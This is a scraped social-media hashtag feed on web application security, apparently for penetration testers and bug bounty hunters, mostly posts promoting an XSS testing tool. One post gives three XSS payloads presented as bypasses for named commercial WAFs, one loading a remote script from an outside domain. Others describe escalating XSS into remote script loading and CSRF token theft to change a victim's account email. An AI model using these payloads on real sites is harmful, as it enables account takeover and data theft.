Explore tweets tagged as #WebAppSec
@KN0X55
KNOXSS
11 days
#XSS #WAF #Bypass . ➡️ CloudFlare.<Img Src=OnXSS OnError=(alert)(1)>. ➡️ Imperva.<Image Src=//X55.is OnLoad%0C=import(Src)//. ➡️ Akamai.<A Href AutoFocus %252F="/"OnFocus=k='t',top['aler'%2Bk](1)>. Sign up for free Blind XSS!.- built for pros. #WebAppSec
3
51
292
@siunam321
siunam
3 months
Here's my research about Python dirty Arbitrary File Write to RCE via overwriting shared object files or overwriting bytecode files. Enjoy!. #Research #WebAppSec.
0
54
177
@KN0X55
KNOXSS
14 days
Improve Your #XSS Reports!. ✅ Turn your PoC into a remote script call to load a proper attack code with import(). ✅ Build a CSRF attack by stealing the anti-CSRF token and then changing some user info like their email address. #WebAppSec #BugHunting #Pentesting
Tweet media one
0
1
12
@KN0X55
KNOXSS
1 day
By investing in paid tools you also end up funding more research and discoveries for the field. KNOXSS is created, developed and maintained by.@BRuteLogic. #XSS #WebAppSec #BugBounty #PenTesting
Tweet media one
1
0
3
@KN0X55
KNOXSS
13 days
Don't miss any of our #XSS tips and tricks, bypasses, memes, promos and coupons. 🤓. Hit the 🔔 in our profile page like below!. #WebAppSec #BugBounty #PenTesting
Tweet media one
0
1
9
@brcyrr
Burcu YARAR
10 months
The suggestion of the day; "IDOR: A complete guide to exploiting advanced IDOR vulnerabilities"❗️👩🏻‍💻. Credit: @intigriti 🌟🙌🏻. Link: #CyberSecurity #infosec #Pentesting #appsec #webappsec #IDOR #vulnerability #exploiting
Tweet media one
0
21
81
@KN0X55
KNOXSS
15 days
Run away from outdated #XSS resources out there. The "src" attribute of "img" doesn't need content to pop with "onerror" but you can use a smart one for a staged payload. Calling a remote script is the best way to report a #XSS vulnerability. #WebAppSec #BugBounty #PenTesting
Tweet media one
0
1
15
@KN0X55
KNOXSS
10 days
Get serious about #XSS!. Sign up or upgrade. - built for pros. #WebAppSec #BugBounty #Pentesting
Tweet media one
0
3
10
@KN0X55
KNOXSS
14 days
This classic script vector they use to teach you about XSS doesn't work for DOM-based Reflected vulnerabilities!. You can check that in our modern XSS lab. Stay with the best or miss like the rest. #WebAppSec #BugBounty #PenTesting
Tweet media one
0
7
21
@zaproxy
Zed Attack Proxy
8 months
Tweet media one
0
2
7
@KN0X55
KNOXSS
11 months
Tweet media one
0
1
5
@KN0X55
KNOXSS
11 months
Tweet media one
0
1
11
@BRuteLogic
Brute Logic
11 months
Tweet media one
0
0
9
@BRuteLogic
Brute Logic
11 months
Tweet media one
0
1
21
@CYSECNG
CYSEC Challenge NG
6 months
Stay one step ahead of attackers by discovering essential best practices to secure your web applications and protect sensitive data. #CyberSecurity #WebAppSec #OWASP #cybersecurityawareness
0
3
6
@Sekurenet
SekureNet
2 months
🛡️ Building secure apps starts with the right toolkit!.Here are the Top 7 Web App Security Tools you must know in 2025. Open-source, free & pro-grade picks inside 👇.#CyberSecurity #WebAppSec #OWASP #HackingTools
Tweet media one
1
0
3
@brcyrr
Burcu YARAR
8 months
Tweet media one
1
1
3
@zaproxy
Zed Attack Proxy
9 days
We've recently made some requested changes to the naming and implementation of scan rules which used Time Based attacks. @kingthorin_rm has written about it here: #AppSec #WebAppSec #DAST #DevSecOps.
0
6
13